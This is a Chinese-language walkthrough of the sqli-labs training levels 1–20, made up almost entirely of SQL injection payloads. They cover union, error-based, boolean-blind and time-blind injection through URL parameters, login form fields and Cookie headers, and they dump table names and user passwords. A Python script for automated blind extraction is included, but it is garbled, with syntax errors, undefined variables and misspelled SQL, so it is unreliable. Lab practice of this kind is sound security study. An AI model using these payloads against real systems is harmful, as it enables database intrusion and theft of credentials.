找到注入点闭合后查列数: ?id=1' order by 3--+ 闭合后查库(security): -1' union select 1,database(),3--+ 查表: -1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+ 查列: -1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+ 查数据: ?id=-1' union select 1,2,group_concat(username ,'~', password) from users--+
Less-2
数字型union注入(单引号)
找到注入点后查列数: ?id=1 order by 3 闭合后查库: ?id=-1 union select 1,database(),3 查表: ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' 查列: ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' 查数据: ?id=-1 union select 1,2,group_concat(username ,'~', password) from users
Less-3
字符型union注入(单引号括号)
同理:
?id=1')--+ ?id=1') order by 3--+ ?id=-1') union select 1,2,3--+ ?id=-1') union select 1,database(),version()--+ ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1') union select 1,2,group_concat(username ,'~', password) from users--+
Less-4
字符型union注入(双引号括号)
同理:
?id=-1") union select 1,2,3--+ ?id=-1") union select 1,database(),version()--+ ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1") union select 1,2,group_concat(username ,`~`, password) from users--+
Less-5
单引号闭合,报错注入(无数据回显,有报错回显,这里本人用一下报错注入)
闭合后查库: ?id=1'and extractvalue(1, concat(0x7e,(select database()))) --+ 查表: ?id=1'and extractvalue(1, concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+ 查列: ?id=1'and extractvalue(1, concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+ 查数据: ?id=1'and extractvalue(1, concat('~',(select group_concat(username ,'~', password) from users)))--+
Less-6
双引号闭合,报错注入(方法同上)
?id=1''and extractvalue(1, concat(0x7e,(select database()))) --+ ?id=1''and extractvalue(1, concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+ ?id=1''and extractvalue(1, concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+ ?id=1''and extractvalue(1, concat('~',(select group_concat(username ,'~', password) from users)))--+
Less-7
'))闭合,布尔盲注(无数据回显,无报错回显,只能盲注,这里本人用一下布尔盲注)
过程:
判断库名长度: ?id=1')) and length((select database()))>9--+ 依次爆库名: ?id=1')) and ascii(substr((select database()),1,1))=115--+。 判断表名长度: ?id=1')) and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+ 依次爆表名: ?id=1')) and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+ 判断列名长度: ?id=1')) and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+ 依次爆列名: ?id=1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+ 判断数据内容长度: ?id=1')) and length((select group_concat(username,password) from users))>109--+ 依次爆数据内容 ?id=1')) and ascii(substr((select group_concat(username,password) from users),1,1))>50--+
s = requests.session() url = input("请输入url:") payloads = 'abcdefghijklmnopqrstuvwxyz1234567890'#mysql字母不区分大小写,所以不用加入大写字母,还有各种符号,可以自由添加 headers = {'cookie':''}#需要登陆的可以在这里加入cookies #爆破数据库的长度 for l inrange(1,50):#这里用来爆破库的长度,非必须,可以将爆破库名时的循环设置的长一点,大于正常库名长度 databaseLen_payload = '?id=1\' and length(database())= '+str(l) + ' %23&Submit=Submit#'#将#和\号使用url编码,在#号后将完整的url拼接起来 if''in s.get(url+databaseLen_payload,headers=headers).text:# 这里面写入判断布尔型存在的根据 databaseLen =l break print('database_lenth: '+str(databaseLen))
#爆破数据库的名 database_name = ''# for l inrange(1,databaseLen+1): for i in payloads: database_payload = '?id=1\' and substr(database(),'+str(i)+'\' %23&Submit=Submit#'#拼接完整的url if''in s.get(url+database_payload, headers=headers).text: database_name += i print('database_name:'+database_name)
#爆破表的个数 for l inrange(1,50): tableNum_payload = '?id=1\'and(select count(table_name) from information_schema.tables where table_schema=database())='+str(j)+' %23&Submit=Submit#' if''in s.get(url+tableNum_payload,headers=headers).text: tableNum =l break print('tableNum:'+str(tableNum))
#爆出所有的表名 #先爆出表名的长度 for l inrange(0,tableNum): table_name = '' for i inrange(1,50): tableLen_payload = '?id=1\' and length(substr((select table_name form information_schema.tables where tale_schema=database() limit ' +str(l) +',1),1))=' +str(i) +' %23&Submit = Submit#' # 用法substr('This is a test', 6) 返回'is a test' if''in s.get(url+tableLen_payload, headers=headers).text: tableLen = i print('table'+str(j+1)+'_length: '+str(tableLen)) # (2)内部循环爆破每个表的表名 for m inrange(1,tableLen+1): for n in payloads: # i在上个循环用过了 table_payload = '?id=1\' and substr((select table_name from information_schema.tables where table_schema=database() limit '+str(j)+',1),'+str(m)+',1)=\''+str(n)+'\' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url+table_payload, headers=headers).text: table_name += n print('table'+str(j+1)+'_name: '+table_name)
#根据上个脚本获得的结果,来跑对应表中的字段
s =requests.session() #保持会话
#判断表中的字段数目 columnNum = 0 for l inrange(50): columnNum_payload = '?id=1\' and(select count(column_name)from information_schema.columns where table_name = \ '') = 'str(l)+'%23&Submit = Submit' if''in s.get(url+columnNum_payload,headers=headers).text: columnNum = l break print('columnNum:'+str(columnNum))
#爆出每个字段的长度 for l inrange(0,columnNum): column_name = '' for i inrange(1,50): columnLen_payload = '?id=1\' and length(substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit ' + str( j) + ',1),1))=' + str(i) + ' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url + columnLen_payload, headers=headers).text: columnLen = i print('column' + str(j + 1) + '_length: ' + str(columnLen))
# (2)内部循环爆破每个表的表名 for m inrange(1, columnLen + 1): for n in payloads: # i在上个循环用过了 column_payload = '?id=1\' and substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit ' + str( j) + ',1),' + str(m) + ',1)=\'' + str(n) + '\' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url + column_payload, headers=headers).text: column_name += n print('column' + str(j + 1) + '_name: ' + column_name)
Less-8
'闭合,布尔盲注
判断库名长度: ?id=1' and length((select database()))>9--+ 依次爆库名: ?id=1' and ascii(substr((select database()),1,1))=115--+。 判断表名长度: ?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+ 依次爆表名: ?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+ 判断列名长度: ?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+ 依次爆列名: ?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+ 判断数据内容长度: ?id=1' and length((select group_concat(username,password) from users))>109--+ 依次爆数据内容: ?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+
Less-9
'闭合,时间盲注
判断库名长度: ?id=1' and if(length((select database()))>9,sleep(5),1)--+ 依次爆库名: ?id=1' and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+ 判断表名长度: ?id=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+ 依次爆表名: ?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+ 判断列名长度: ?id=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+ 依次爆列名: ?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+ 判断数据内容长度: ?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+ 依次爆数据内容: ?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
Less-10
''闭合,时间盲注(方法同上)
Less-11
POST型注入,'闭合(需用#注释)
1' or 1=1 #判断是否存在sql注入。 1' union select 1,2#
接下来正常union联合注入
Less-12
POST型注入,")闭合
1" ) or 1=1 #判断是否存在sql注入。 1" ) union select 1,2#
接下来正常union联合注入
Less-13
POST型注入,'闭合
接下来正常union联合注入
Less-14
POST型注入,"闭合
接下来正常union联合注入
Less-15
POST型注入,'闭合,无回显
接下来正常布尔盲注
Less-16
POST型注入,")闭合,无回显
接下来正常布尔盲注
Less-17
POST型报错注入,'闭合
经测试在密码框注入
uname=admin&passwd=6666' or updatexml(1,concat(0x7e,(version()),0x7e),0) or '&submit=Submit
Less-18
请求头(UA)报错注入,'闭合
Less-19
请求头(Referer)报错注入,'闭合
Less-20
请求头(Cookie)报错注入,'闭合
Cookie: uname=' union select 1,database(),3 or 1=1 #;